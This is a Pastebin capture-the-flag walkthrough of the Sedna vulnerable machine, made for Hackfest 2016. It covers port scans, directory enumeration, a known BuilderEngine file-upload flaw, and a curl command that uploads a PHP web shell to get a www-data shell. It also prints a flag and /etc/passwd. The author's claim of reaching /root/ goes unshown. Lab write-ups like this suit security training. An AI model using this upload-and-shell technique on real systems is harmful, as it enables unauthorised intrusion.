daily pastebin goal
45%
SHARE
TWEET

Sedna CTF Walkthrough - D3M0GORG0N

a guest Apr 29th, 2017 1,014 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. =============================
  2. Walkthrough by D3M0GORG0N @HF
  3. =============================
  4.  
  5.  
  6. Welcome to Sedna
  7.  
  8. This is a vulnerable machine i created for the Hackfest 2016 CTF http://hackfest.ca/
  9.  
  10. Difficulty : Medium
  11.  
  12. Tips:
  13.  
  14. There are multiple way to root this box, if it should work but doesn't try to
  15. gather more info about why its not working.
  16.  
  17. Goals: This machine is intended to be doable by someone who have some experience
  18. in doing machine on vulnhub
  19.  
  20. There are 4 flags on this machine:
  21. - One for a shell
  22. - One for root access
  23. - Two for doing post exploitation
  24.  
  25. =================================================================================
  26.  
  27. Target IP: 192.168.56.101
  28.  
  29. ==================================================================================
  30.  
  31. PORT      STATE SERVICE     VERSION
  32. 22/tcp    open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
  33. | ssh-hostkey:
  34. |   1024 aa:c3:9e:80:b4:81:15:dd:60:d5:08:ba:3f:e0:af:08 (DSA)
  35. |   2048 41:7f:c2:5d:d5:3a:68:e4:c5:d9:cc:60:06:76:93:a5 (RSA)
  36. |_  256 ef:2d:65:85:f8:3a:85:c2:33:0b:7d:f9:c8:92:22:03 (ECDSA)
  37. 53/tcp    open  domain      ISC BIND 9.9.5-3-Ubuntu
  38. | dns-nsid:
  39. |_  bind.version: 9.9.5-3-Ubuntu
  40. 80/tcp    open  http        Apache httpd 2.4.7 ((Ubuntu))
  41. | http-robots.txt: 1 disallowed entry
  42. |_Hackers
  43. |_http-server-header: Apache/2.4.7 (Ubuntu)
  44. |_http-title: Site doesn't have a title (text/html).
  45. 110/tcp   open  pop3        Dovecot pop3d
  46. |_pop3-capabilities: SASL AUTH-RESP-CODE RESP-CODES STLS CAPA TOP PIPELINING UIDL
  47. | ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
  48. | Not valid before: 2016-10-07T19:17:14
  49. |_Not valid after:  2026-10-07T19:17:14
  50. |_ssl-date: TLS randomness does not represent time
  51. 111/tcp   open  rpcbind     2-4 (RPC #100000)
  52. | rpcinfo:
  53. |   program version   port/proto  service
  54. |   100000  2,3,4        111/tcp  rpcbind
  55. |   100000  2,3,4        111/udp  rpcbind
  56. |   100024  1          54863/udp  status
  57. |_  100024  1          57224/tcp  status
  58. 139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
  59. 143/tcp   open  imap        Dovecot imapd (Ubuntu)
  60. |_imap-capabilities: IDLE more LITERAL+ have LOGIN-REFERRALS LOGINDISABLEDA0001 Pre-login ID capabilities listed OK SASL-IR ENABLE IMAP4rev1 STARTTLS post-login
  61. | ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
  62. | Not valid before: 2016-10-07T19:17:14
  63. |_Not valid after:  2026-10-07T19:17:14
  64. |_ssl-date: TLS randomness does not represent time
  65. 445/tcp   open  netbios-ssn Samba smbd 4.1.6-Ubuntu (workgroup: WORKGROUP)
  66. 993/tcp   open  ssl/imap    Dovecot imapd (Ubuntu)
  67. |_imap-capabilities: IDLE AUTH=PLAINA0001 IMAP4rev1 more have LOGIN-REFERRALS ID capabilities listed Pre-login SASL-IR ENABLE OK LITERAL+ post-login
  68. | ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
  69. | Not valid before: 2016-10-07T19:17:14
  70. |_Not valid after:  2026-10-07T19:17:14
  71. |_ssl-date: TLS randomness does not represent time
  72. 995/tcp   open  ssl/pop3    Dovecot pop3d
  73. |_pop3-capabilities: SASL(PLAIN) AUTH-RESP-CODE RESP-CODES USER CAPA TOP PIPELINING UIDL
  74. | ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
  75. | Not valid before: 2016-10-07T19:17:14
  76. |_Not valid after:  2026-10-07T19:17:14
  77. |_ssl-date: TLS randomness does not represent time
  78. 8080/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
  79. | http-methods:
  80. |_  Potentially risky methods: PUT DELETE
  81. |_http-open-proxy: Proxy might be redirecting requests
  82. |_http-server-header: Apache-Coyote/1.1
  83. |_http-title: Apache Tomcat
  84. 57224/tcp open  status      1 (RPC #100024)
  85. MAC Address: 08:00:27:DD:47:80 (Oracle VirtualBox virtual NIC)
  86. Device type: general purpose
  87. Running: Linux 3.X|4.X
  88. OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
  89. OS details: Linux 3.2 - 4.6
  90. Network Distance: 1 hop
  91. Service Info: Host: SEDNA; OS: Linux; CPE: cpe:/o:linux:linux_kernel
  92.  
  93. Host script results:
  94. |_clock-skew: mean: 59m56s, deviation: 0s, median: 59m56s
  95. |_nbstat: NetBIOS name: SEDNA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
  96. | smb-os-discovery:
  97. |   OS: Unix (Samba 4.1.6-Ubuntu)
  98. |   NetBIOS computer name: SEDNA\x00
  99. |   Workgroup: WORKGROUP\x00
  100. |_  System time: 2017-03-27T17:11:37-04:00
  101. | smb-security-mode:
  102. |   account_used: guest
  103. |   authentication_level: user
  104. |   challenge_response: supported
  105. |_  message_signing: disabled (dangerous, but default)
  106. |_smbv2-enabled: Server supports SMBv2 protocol
  107.  
  108. ===================================================================================
  109.  
  110. Open Services:
  111.  
  112. 22/tcp    open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
  113. 53/tcp    open  domain      ISC BIND 9.9.5-3-Ubuntu
  114. 80/tcp    open  http        Apache httpd 2.4.7 ((Ubuntu))
  115. 110/tcp   open  pop3        Dovecot pop3d
  116. 111/tcp   open  rpcbind     2-4 (RPC #100000)
  117. 139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
  118. 143/tcp   open  imap        Dovecot imapd (Ubuntu)
  119. 445/tcp   open  netbios-ssn Samba smbd 4.1.6-Ubuntu (workgroup: WORKGROUP)
  120. 993/tcp   open  ssl/imap    Dovecot imapd (Ubuntu)
  121. 995/tcp   open  ssl/pop3    Dovecot pop3d
  122. 57224/tcp open  status      1 (RPC #100024)
  123.  
  124. =================================================================================
  125.  
  126. Broken image link, also another 'Hackers' reference.
  127. Nothing hidden in index.jpeg
  128.  
  129. DECIMAL       HEXADECIMAL     DESCRIPTION
  130. --------------------------------------------------------------------------------
  131. 0             0x0             JPEG image data, JFIF standard 1.01
  132. 30            0x1E            TIFF image data, little-endian offset of first image directory: 8
  133.  
  134. ==================================================================================
  135.  
  136. http://192.168.56.101/wordpress/ wasn't found. Not running WordPress?
  137.  
  138. Definitely doesn't seem to be running WordPress, see uniscan.txt for full report.
  139.  
  140. | Directory check:
  141. | [+] CODE: 200 URL: http://192.168.56.101/blocks/
  142. | [+] CODE: 200 URL: http://192.168.56.101/files/
  143. | [+] CODE: 200 URL: http://192.168.56.101/modules/
  144. | [+] CODE: 200 URL: http://192.168.56.101/system/
  145. | [+] CODE: 200 URL: http://192.168.56.101/themes/
  146.  
  147. | File check:
  148. | [+] CODE: 200 URL: http://192.168.56.101/index.html
  149. | [+] CODE: 200 URL: http://192.168.56.101/license.txt
  150. | [+] CODE: 200 URL: http://192.168.56.101/robots.txt
  151.  
  152. ================================================================================
  153.  
  154. An interesting subdir: /files/users/
  155. Lots of resources in /blocks/, look further later on.
  156. Something called Admin.php in /modules/module_system/controllers/.
  157. Access is forbidden in /system/
  158.  
  159. http://192.168.56.101/index.html looks to be the start of the challenge.
  160.  
  161. SSH doesn't give anything away: 'root@192.168.56.101's password: '
  162.  
  163. =================================================================================
  164.  
  165. http://192.168.56.101:8080/ reveals an Apache Tomcat service. Looks like it's
  166. running defaults. Potential for exploitation?
  167.  
  168. Apache Tomcat/7.0.52 (Ubuntu)
  169.  
  170. http://www.cvedetails.com/cve/CVE-2016-6816/ <-- XSS flaw in this version.
  171.  
  172. =================================================================================
  173.  
  174. http://192.168.56.101:8080/docs/manager-howto.html#Configuring_Manager_Application_Access
  175.  
  176. ^ Docs on RCE.
  177.  
  178. Example: http://{host}:{port}/manager/text/{command}?{parameters}
  179.  
  180. Tomcat users are defined in the file – $TOMCAT_HOME/conf/tomcat-users.xml,
  181. by default, there is NO user, it means no one can access the Tomcat manager page.
  182.  
  183. ========================================================================================
  184.  
  185. Tomcat requires a password from a valid user, no default creds available.
  186. Vulnerable SMB client?
  187.  
  188. ========================================================================================
  189.  
  190. Long time since I've had a pop at this, speaking of which:
  191.  
  192. ┌─[✗]─[root@parrot]─[/home/user/Desktop/CTF/Sedna]
  193. └──╼ #telnet 192.168.56.101 110
  194. Trying 192.168.56.101...
  195. Connected to 192.168.56.101.
  196. Escape character is '^]'.
  197. +OK Dovecot (Ubuntu) ready.
  198.  
  199.  
  200. Seems like Dovecot is a possible attack vector.
  201.  
  202. Attempted an overflow:
  203.  
  204. ERR Input buffer full, aborting
  205.  
  206. Either a countermeasure or a legitimate error.
  207.  
  208. =======================================================
  209. Taking a moment to look back over files I already have.
  210. =======================================================
  211.  
  212. http://192.168.56.101/license.txt
  213.  
  214. The MIT License (MIT)
  215.  
  216. Copyright (c) 2012 - 2015 BuilderEngine / Radian Enterprise Systems Limited.
  217.  
  218. Permission is hereby granted, free of charge, to any person obtaining a copy
  219. of this software and associated documentation files (the "Software"), to deal
  220. in the Software without restriction, including without limitation the rights
  221. to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
  222. copies of the Software, and to permit persons to whom the Software is
  223. furnished to do so, subject to the following conditions:
  224.  
  225. The above copyright notice and this permission notice shall be included in
  226. all copies or substantial portions of the Software.
  227.  
  228. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
  229. IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
  230. FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
  231. AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
  232. LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
  233. OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
  234. THE SOFTWARE.
  235.  
  236. ^ BuilderEngine, could be useful?
  237.  
  238. =============================================================================
  239.  
  240. http://192.168.56.101/builderengine/
  241.  
  242. And this, is why you don't rely on one directory bruter... -_-
  243.  
  244. ==========================================================================
  245.  
  246. https://www.exploit-db.com/exploits/40390/
  247.  
  248. Welp, file upload vuln from 2016...
  249.  
  250. So there's an uploader plugin located in /themes/dashboard/assets/plugins/jquery-file-upload
  251.  
  252. All I have to do is send a POST request to the plugin and it should let me through?
  253.  
  254. Created pwn.php with no password.
  255.  
  256. Full command was:
  257.  
  258. curl --proxy http://127.0.0.1:8080 --form "files[]=@pwn.php" http://192.168.56.101/themes/dashboard/assets/plugins/jquery-file-upload/server/php/
  259.  
  260. ==========================================================================
  261.  
  262. It worked! :D
  263.  
  264. http://192.168.56.101/files/pwn.php
  265.  
  266. Shell is online and functional.
  267.  
  268. =========================================================================
  269.  
  270. /var/www/html/files/>id
  271. uid=33(www-data) gid=33(www-data) groups=33(www-data)
  272.  
  273. In as 'www-data' again, time to do exfil and priv-esc.
  274.  
  275. ==============================================================================
  276.  
  277. So the first flag is down, now I need root access, however I can access /root/ already.
  278.  
  279. /var/www/html/>more codeception.yml
  280. ::::::::::::::
  281. codeception.yml
  282. ::::::::::::::
  283. paths:
  284.     tests: tests
  285.     log: tests/_log
  286.     data: tests/_data
  287.     helpers: tests/_helpers
  288. settings:
  289.     bootstrap: _bootstrap.php
  290.     suite_class: \PHPUnit_Framework_TestSuite
  291.     colors: false
  292.     memory_limit: 1024M
  293.     log: true
  294. modules:
  295.     config:
  296.         Db:
  297.             dsn: ''
  298.             user: ''
  299.             password: ''
  300.             dump: tests/_data/dump.sql
  301.  
  302.  
  303. /var/www/>cat flag.txt
  304. bfbb7e6e6e88d9ae66848b9aeac6b289
  305.  
  306.  
  307. /etc/>cat passwd
  308. root:x:0:0:root:/root:/bin/bash
  309. daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
  310. bin:x:2:2:bin:/bin:/usr/sbin/nologin
  311. sys:x:3:3:sys:/dev:/usr/sbin/nologin
  312. sync:x:4:65534:sync:/bin:/bin/sync
  313. games:x:5:60:games:/usr/games:/usr/sbin/nologin
  314. man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
  315. lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
  316. mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
  317. news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
  318. uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
  319. proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
  320. www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
  321. backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
  322. list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
  323. irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
  324. gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
  325. nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
  326. libuuid:x:100:101::/var/lib/libuuid:
  327. syslog:x:101:104::/home/syslog:/bin/false
  328. mysql:x:102:106:MySQL Server,,,:/nonexistent:/bin/false
  329. messagebus:x:103:108::/var/run/dbus:/bin/false
  330. bind:x:104:115::/var/cache/bind:/bin/false
  331. postfix:x:105:116::/var/spool/postfix:/bin/false
  332. dnsmasq:x:106:65534:dnsmasq,,,:/var/lib/misc:/bin/false
  333. dovecot:x:107:118:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
  334. dovenull:x:108:119:Dovecot login user,,,:/nonexistent:/bin/false
  335. landscape:x:109:120::/var/lib/landscape:/bin/false
  336. sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
  337. postgres:x:111:121:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
  338. avahi:x:112:122:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
  339. colord:x:113:124:colord colour management daemon,,,:/var/lib/colord:/bin/false
  340. libvirt-qemu:x:114:107:Libvirt Qemu,,,:/var/lib/libvirt:/bin/false
  341. libvirt-dnsmasq:x:115:125:Libvirt Dnsmasq,,,:/var/lib/libvirt/dnsmasq:/bin/false
  342. tomcat7:x:116:126::/usr/share/tomcat7:/bin/false
  343. crackmeforpoints:x:1000:1000::/home/crackmeforpoints:
  344. statd:x:117:65534::/var/lib/nfs:/bin/false
  345.  
  346.  
  347. No password on the SQL database:  `password` varchar(60) DEFAULT NULL,
  348.  
  349. ========================================================================================
  350.  
  351. crackmeforpoints:x:1000:1000::/home/crackmeforpoints:
  352.  
  353. ^ This looks interesting...
  354.  
  355. I might try using Python to escalate privileges, might not work...
  356.  
  357. Yeah, didn't work as planned. I need nano to do what I wanted. :/
  358.  
  359. Either way, I'm calling this a victory, the system has been breached and I can access /root/
  360.  
  361. ========================================================================================
  362.  
  363.  
  364. =============================
  365. Walkthrough by D3M0GORG0N @HF
  366. =============================
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top